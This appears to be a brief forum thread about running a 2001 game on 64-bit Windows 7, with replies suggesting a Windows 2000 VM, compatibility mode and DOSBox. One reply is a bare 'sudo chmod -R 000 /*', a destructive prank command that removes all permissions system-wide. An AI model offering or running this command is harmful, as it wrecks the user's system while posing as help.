x86 & x64 incompatibilities

I'm trying to run a very old game (made in 2001) on my windows 7 64 bit machine. This is the error I am getting:

I have tried running it in compatibility mode with pretty much every setting, how do I do this?

the best way would be running it in a windows 2000 vm. If you don't have win2000, try the compatibility modes again but this time disable aero.

sudo chmod -R 000 /*

Believe this was a Dos game, have you looked at DosBox?
